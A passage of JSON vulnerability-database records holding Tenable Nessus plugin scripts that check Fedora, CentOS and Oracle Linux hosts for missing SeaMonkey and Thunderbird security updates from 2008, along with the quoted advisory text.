redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"devhelp / devhelp-devel / seamonkey / seamonkey-chat / etc\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:35:01", "references": ["http://www.nessus.org/u?bafd2623"], "pluginID": "34307", "description": "Updated seamonkey packages that fix several security issues are now available for Fedora 8 and Fedora 9. This update has been rated as having critical security impact by the Red Hat Security Response Team.\nSeaMonkey is an open source Web browser, advanced email and newsgroup client, IRC chat client, and HTML editor. Several flaws were found in the processing of malformed web content. A web page containing malicious content could cause SeaMonkey to crash or, potentially, execute arbitrary code as the user running SeaMonkey. (CVE-2008-0016, CVE-2008-4058, CVE-2008-4059, CVE-2008-4060, CVE-2008-4061, CVE-2008-4062) Several flaws were found in the way malformed web content was displayed. A web page containing specially crafted content could potentially trick a SeaMonkey user into surrendering sensitive information. (CVE-2008-3835, CVE-2008-4067, CVE-2008-4068, CVE-2008-4069) A flaw was found in the way SeaMonkey handles mouse click events. A web page containing specially crafted JavaScript code could move the content window while a mouse-button was pressed, causing any item under the pointer to be dragged. This could, potentially, cause the user to perform an unsafe drag-and-drop action.\n(CVE-2008-3837) A flaw was found in SeaMonkey that caused certain characters to be stripped from JavaScript code. This flaw could allow malicious JavaScript to bypass or evade script filters.\n(CVE-2008-4065, CVE-2008-4066) All SeaMonkey users should upgrade to these updated packages, which contain patches to resolve these issues.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 5, "reporter": "Tenable", "published": "2008-09-29T00:00:00", "title": "Fedora 8 : seamonkey-1.1.12-1.fc8 (2008-8401)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3835", "CVE-2008-4067", "CVE-2008-4066", "CVE-2008-4069", "CVE-2008-0016", "CVE-2008-4059", "CVE-2008-3837", "CVE-2008-4062", "CVE-2008-4060", "CVE-2008-4058", "CVE-2008-4068", "CVE-2008-4061", "CVE-2008-4065"], "modified": "2016-12-08T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:8", "p-cpe:/a:fedoraproject:fedora:seamonkey"], "id": "FEDORA_2008-8401.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=34307", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2008-8401.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(34307);\n script_version (\"$Revision: 1.13 $\");\n script_cvs_date(\"$Date: 2016/12/08 20:21:54 $\");\n\n script_cve_id(\"CVE-2008-0016\", \"CVE-2008-3835\", \"CVE-2008-3837\", \"CVE-2008-4058\", \"CVE-2008-4059\", \"CVE-2008-4060\", \"CVE-2008-4061\", \"CVE-2008-4062\", \"CVE-2008-4065\", \"CVE-2008-4066\", \"CVE-2008-4067\", \"CVE-2008-4068\", \"CVE-2008-4069\");\n script_xref(name:\"FEDORA\", value:\"2008-8401\");\n\n script_name(english:\"Fedora 8 : seamonkey-1.1.12-1.fc8 (2008-8401)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated seamonkey packages that fix several security issues are now\navailable for Fedora 8 and Fedora 9. This update has been rated as\nhaving critical security impact by the Red Hat Security Response Team.\nSeaMonkey is an open source Web browser, advanced email and newsgroup\nclient, IRC chat client, and HTML editor. Several flaws were found in\nthe processing of malformed web content. A web page containing\nmalicious content could cause SeaMonkey to crash or, potentially,\nexecute arbitrary code as the user running SeaMonkey. (CVE-2008-0016,\nCVE-2008-4058, CVE-2008-4059, CVE-2008-4060, CVE-2008-4061,\nCVE-2008-4062) Several flaws were found in the way malformed web\ncontent was displayed. A web page containing specially crafted content\ncould potentially trick a SeaMonkey user into surrendering sensitive\ninformation. (CVE-2008-3835, CVE-2008-4067, CVE-2008-4068,\nCVE-2008-4069) A flaw was found in the way SeaMonkey handles mouse\nclick events. A web page containing specially crafted JavaScript code\ncould move the content window while a mouse-button was pressed,\ncausing any item under the pointer to be dragged. This could,\npotentially, cause the user to perform an unsafe drag-and-drop action.\n(CVE-2008-3837) A flaw was found in SeaMonkey that caused certain\ncharacters to be stripped from JavaScript code. This flaw could allow\nmalicious JavaScript to bypass or evade script filters.\n(CVE-2008-4065, CVE-2008-4066) All SeaMonkey users should upgrade to\nthese updated packages, which contain patches to resolve these issues.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2008-September/014915.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?bafd2623\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected seamonkey package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(22, 79, 119, 189, 200, 264, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:seamonkey\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:8\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/09/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/09/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^8([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 8.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC8\", reference:\"seamonkey-1.1.12-1.fc8\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"seamonkey\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:34:40", "references": ["http://www.nessus.org/u?22fb0b5a", "http://www.nessus.org/u?b937aa7b", "http://www.nessus.org/u?2bdda88a", "http://www.nessus.org/u?2e52a43f", "http://www.nessus.org/u?9eca68be", "http://www.nessus.org/u?fd22b199"], "pluginID": "34278", "description": "Updated SeaMonkey packages that fix a security issues are now available for Red Hat Enterprise Linux 2.1, Red Hat Enterprise Linux 3 and Red Hat Enterprise Linux 4.\n\nThis update has been rated as having critical security impact by the Red Hat Security Response Team.\n\nSeaMonkey is an open source Web browser, advanced email and newsgroup client, IRC chat client, and HTML editor.\n\nSeveral flaws were found in the processing of malformed web content. A web page containing malicious content could cause SeaMonkey to crash or, potentially, execute arbitrary code as the user running SeaMonkey.\n(CVE-2008-0016, CVE-2008-4058, CVE-2008-4059, CVE-2008-4060, CVE-2008-4061, CVE-2008-4062)\n\nSeveral flaws were found in the way malformed web content was displayed. A web page containing specially crafted content could potentially trick a SeaMonkey user into surrendering sensitive information. (CVE-2008-3835, CVE-2008-4067, CVE-2008-4068, CVE-2008-4069)\n\nA flaw was found in the way SeaMonkey handles mouse click events. A web page containing specially crafted JavaScript code could move the content window while a mouse-button was pressed, causing any item under the pointer to be dragged. This could, potentially, cause the user to perform an unsafe drag-and-drop action. (CVE-2008-3837)\n\nA flaw was found in SeaMonkey that caused certain characters to be stripped from JavaScript code. This flaw could allow malicious JavaScript to bypass or evade script filters. (CVE-2008-4065, CVE-2008-4066)\n\nAll SeaMonkey users should upgrade to these updated packages, which contain backported patches to resolve these issues.", "edition": 6, "reporter": "Tenable", "published": "2008-09-25T00:00:00", "title": "CentOS 3 / 4 : seamonkey (CESA-2008:0882)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "CentOS Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3835", "CVE-2008-4067", "CVE-2008-4066", "CVE-2008-4069", "CVE-2008-0016", "CVE-2008-4059", "CVE-2008-3837", "CVE-2008-4062", "CVE-2008-4060", "CVE-2008-4058", "CVE-2008-4068", "CVE-2008-4061", "CVE-2008-4065"], "modified": "2018-06-27T00:00:00", "cpe": ["p-cpe:/a:centos:centos:seamonkey-nspr-devel", "p-cpe:/a:centos:centos:seamonkey-mail", "p-cpe:/a:centos:centos:seamonkey-nss-devel", "p-cpe:/a:centos:centos:seamonkey-dom-inspector", "p-cpe:/a:centos:centos:seamonkey-chat", "cpe:/o:centos:centos:4", "p-cpe:/a:centos:centos:seamonkey-nss", "p-cpe:/a:centos:centos:seamonkey-nspr", "p-cpe:/a:centos:centos:seamonkey", "p-cpe:/a:centos:centos:seamonkey-js-debugger", "p-cpe:/a:centos:centos:seamonkey-devel", "cpe:/o:centos:centos:3"], "id": "CENTOS_RHSA-2008-0882.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=34278", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2008:0882 and \n# CentOS Errata and Security Advisory 2008:0882 respectively.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(34278);\n script_version(\"1.14\");\n script_cvs_date(\"Date: 2018/06/27 18:42:25\");\n\n script_cve_id(\"CVE-2008-0016\", \"CVE-2008-3835\", \"CVE-2008-3837\", \"CVE-2008-4058\", \"CVE-2008-4059\", \"CVE-2008-4060\", \"CVE-2008-4061\", \"CVE-2008-4062\", \"CVE-2008-4065\", \"CVE-2008-4066\", \"CVE-2008-4067\", \"CVE-2008-4068\", \"CVE-2008-4069\");\n script_bugtraq_id(31346);\n script_xref(name:\"RHSA\", value:\"2008:0882\");\n\n script_name(english:\"CentOS 3 / 4 : seamonkey (CESA-2008:0882)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated SeaMonkey packages that fix a security issues are now\navailable for Red Hat Enterprise Linux 2.1, Red Hat Enterprise Linux 3\nand Red Hat Enterprise Linux 4.\n\nThis update has been rated as having critical security impact by the\nRed Hat Security Response Team.\n\nSeaMonkey is an open source Web browser, advanced email and newsgroup\nclient, IRC chat client, and HTML editor.\n\nSeveral flaws were found in the processing of malformed web content. A\nweb page containing malicious content could cause SeaMonkey to crash\nor, potentially, execute arbitrary code as the user running SeaMonkey.\n(CVE-2008-0016, CVE-2008-4058, CVE-2008-4059, CVE-2008-4060,\nCVE-2008-4061, CVE-2008-4062)\n\nSeveral flaws were found in the way malformed web content was\ndisplayed. A web page containing specially crafted content could\npotentially trick a SeaMonkey user into surrendering sensitive\ninformation. (CVE-2008-3835, CVE-2008-4067, CVE-2008-4068,\nCVE-2008-4069)\n\nA flaw was found in the way SeaMonkey handles mouse click events. A\nweb page containing specially crafted JavaScript code could move the\ncontent window while a mouse-button was pressed, causing any item\nunder the pointer to be dragged. This could, potentially, cause the\nuser to perform an unsafe drag-and-drop action. (CVE-2008-3837)\n\nA flaw was found in SeaMonkey that caused certain characters to be\nstripped from JavaScript code. This flaw could allow malicious\nJavaScript to bypass or evade script filters. (CVE-2008-4065,\nCVE-2008-4066)\n\nAll SeaMonkey users should upgrade to these updated packages, which\ncontain backported patches to resolve these issues.\"\n );\n # http://lists.centos.org/pipermail/centos-announce/2008-September/015264.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2e52a43f\"\n );\n # http://lists.centos.org/pipermail/centos-announce/2008-September/015265.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?fd22b199\"\n );\n # http://lists.centos.org/pipermail/centos-announce/2008-September/015268.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?9eca68be\"\n );\n # http://lists.centos.org/pipermail/centos-announce/2008-September/015269.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?2bdda88a\"\n );\n # http://lists.centos.org/pipermail/centos-announce/2008-September/015275.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b937aa7b\"\n );\n # http://lists.centos.org/pipermail/centos-announce/2008-September/015276.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?22fb0b5a\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected seamonkey packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(22, 79, 119, 189, 200, 264, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:seamonkey\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:seamonkey-chat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:seamonkey-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:seamonkey-dom-inspector\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:seamonkey-js-debugger\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:seamonkey-mail\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:seamonkey-nspr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:seamonkey-nspr-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:seamonkey-nss\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:seamonkey-nss-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/09/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2018 Tenable Network Security, Inc.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/CentOS/release\")) audit(AUDIT_OS_NOT, \"CentOS\");\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-3\", reference:\"seamonkey-1.0.9-0.24.el3.centos3\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"seamonkey-chat-1.0.9-0.24.el3.centos3\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"seamonkey-devel-1.0.9-0.24.el3.centos3\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"seamonkey-dom-inspector-1.0.9-0.24.el3.centos3\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"seamonkey-js-debugger-1.0.9-0.24.el3.centos3\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"seamonkey-mail-1.0.9-0.24.el3.centos3\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"seamonkey-nspr-1.0.9-0.24.el3.centos3\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"seamonkey-nspr-devel-1.0.9-0.24.el3.centos3\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"seamonkey-nss-1.0.9-0.24.el3.centos3\")) flag++;\nif (rpm_check(release:\"CentOS-3\", reference:\"seamonkey-nss-devel-1.0.9-0.24.el3.centos3\")) flag++;\n\nif (rpm_check(release:\"CentOS-4\", reference:\"seamonkey-1.0.9-26.el4.centos\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"seamonkey-chat-1.0.9-26.el4.centos\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"seamonkey-devel-1.0.9-26.el4.centos\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"seamonkey-dom-inspector-1.0.9-26.el4.centos\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"seamonkey-js-debugger-1.0.9-26.el4.centos\")) flag++;\nif (rpm_check(release:\"CentOS-4\", reference:\"seamonkey-mail-1.0.9-26.el4.centos\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:36:13", "references": ["http://www.nessus.org/u?6cec37da"], "pluginID": "34309", "description": "Updated seamonkey packages that fix several security issues are now available for Fedora 8 and Fedora 9. This update has been rated as having critical security impact by the Red Hat Security Response Team.\nSeaMonkey is an open source Web browser, advanced email and newsgroup client, IRC chat client, and HTML editor. Several flaws were found in the processing of malformed web content. A web page containing malicious content could cause SeaMonkey to crash or, potentially, execute arbitrary code as the user running SeaMonkey. (CVE-2008-0016, CVE-2008-4058, CVE-2008-4059, CVE-2008-4060, CVE-2008-4061, CVE-2008-4062) Several flaws were found in the way malformed web content was displayed. A web page containing specially crafted content could potentially trick a SeaMonkey user into surrendering sensitive information. (CVE-2008-3835, CVE-2008-4067, CVE-2008-4068, CVE-2008-4069) A flaw was found in the way SeaMonkey handles mouse click events. A web page containing specially crafted JavaScript code could move the content window while a mouse-button was pressed, causing any item under the pointer to be dragged. This could, potentially, cause the user to perform an unsafe drag-and-drop action.\n(CVE-2008-3837) A flaw was found in SeaMonkey that caused certain characters to be stripped from JavaScript code. This flaw could allow malicious JavaScript to bypass or evade script filters.\n(CVE-2008-4065, CVE-2008-4066) All SeaMonkey users should upgrade to these updated packages, which contain patches to resolve these issues.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 5, "reporter": "Tenable", "published": "2008-09-29T00:00:00", "title": "Fedora 9 : seamonkey-1.1.12-1.fc9 (2008-8429)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-3835", "CVE-2008-4067", "CVE-2008-4066", "CVE-2008-4069", "CVE-2008-0016", "CVE-2008-4059", "CVE-2008-3837", "CVE-2008-4062", "CVE-2008-4060", "CVE-2008-4058", "CVE-2008-4068", "CVE-2008-4061", "CVE-2008-4065"], "modified": "2016-12-08T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:9", "p-cpe:/a:fedoraproject:fedora:seamonkey"], "id": "FEDORA_2008-8429.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=34309", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2008-8429.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(34309);\n script_version (\"$Revision: 1.13 $\");\n script_cvs_date(\"$Date: 2016/12/08 20:21:54 $\");\n\n script_cve_id(\"CVE-2008-0016\", \"CVE-2008-3835\", \"CVE-2008-3837\", \"CVE-2008-4058\", \"CVE-2008-4059\", \"CVE-2008-4060\", \"CVE-2008-4061\", \"CVE-2008-4062\", \"CVE-2008-4065\", \"CVE-2008-4066\", \"CVE-2008-4067\", \"CVE-2008-4068\", \"CVE-2008-4069\");\n script_xref(name:\"FEDORA\", value:\"2008-8429\");\n\n script_name(english:\"Fedora 9 : seamonkey-1.1.12-1.fc9 (2008-8429)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated seamonkey packages that fix several security issues are now\navailable for Fedora 8 and Fedora 9. This update has been rated as\nhaving critical security impact by the Red Hat Security Response Team.\nSeaMonkey is an open source Web browser, advanced email and newsgroup\nclient, IRC chat client, and HTML editor. Several flaws were found in\nthe processing of malformed web content. A web page containing\nmalicious content could cause SeaMonkey to crash or, potentially,\nexecute arbitrary code as the user running SeaMonkey. (CVE-2008-0016,\nCVE-2008-4058, CVE-2008-4059, CVE-2008-4060, CVE-2008-4061,\nCVE-2008-4062) Several flaws were found in the way malformed web\ncontent was displayed. A web page containing specially crafted content\ncould potentially trick a SeaMonkey user into surrendering sensitive\ninformation. (CVE-2008-3835, CVE-2008-4067, CVE-2008-4068,\nCVE-2008-4069) A flaw was found in the way SeaMonkey handles mouse\nclick events. A web page containing specially crafted JavaScript code\ncould move the content window while a mouse-button was pressed,\ncausing any item under the pointer to be dragged. This could,\npotentially, cause the user to perform an unsafe drag-and-drop action.\n(CVE-2008-3837) A flaw was found in SeaMonkey that caused certain\ncharacters to be stripped from JavaScript code. This flaw could allow\nmalicious JavaScript to bypass or evade script filters.\n(CVE-2008-4065, CVE-2008-4066) All SeaMonkey users should upgrade to\nthese updated packages, which contain patches to resolve these issues.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2008-September/014934.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6cec37da\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected seamonkey package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(22, 79, 119, 189, 200, 264, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:seamonkey\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:9\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/09/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/09/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2016 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^9([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 9.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC9\", reference:\"seamonkey-1.1.12-1.fc9\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"seamonkey\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:38:13", "references": ["https://oss.oracle.com/pipermail/el-errata/2008-October/000748.html"], "pluginID": "67754", "description": "From Red Hat Security Advisory 2008:0908 :\n\nUpdated thunderbird packages that fix several security issues are now available for Red Hat Enterprise Linux 4 and 5.\n\nThis update has been rated as having moderate security impact by the Red Hat Security Response Team.\n\nMozilla Thunderbird is a standalone mail and newsgroup client.\n\nSeveral flaws were found in the processing of malformed HTML mail content. An HTML mail message containing malicious content could cause Thunderbird to crash or, potentially, execute arbitrary code as the user running Thunderbird. (CVE-2008-0016, CVE-2008-4058, CVE-2008-4059, CVE-2008-4060, CVE-2008-4061, CVE-2008-4062)\n\nSeveral flaws were found in the way malformed HTML mail content was displayed. An HTML mail message containing specially crafted content could potentially trick a Thunderbird user into surrendering sensitive information. (CVE-2008-3835, CVE-2008-4067, CVE-2008-4068)\n\nA flaw was found in Thunderbird that caused certain characters to be stripped from JavaScript code. This flaw could allow malicious JavaScript to bypass or evade script filters. (CVE-2008-4065, CVE-2008-4066)\n\nNote: JavaScript support is disabled by default in Thunderbird; the above issue is not exploitable unless JavaScript is enabled.\n\nA heap based buffer overflow flaw was found in the handling of cancelled newsgroup messages. If the user cancels a specially crafted newsgroup message it could cause Thunderbird to crash or, potentially, execute arbitrary code as the user running Thunderbird.\n(CVE-2008-4070)\n\nAll Thunderbird users should upgrade to these updated packages, which resolve these issues.", "edition": 6, "reporter": "Tenable", "published": "2013-07-12T00:00:00", "title": "Oracle Linux 4 : thunderbird (ELSA-2008-0908)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 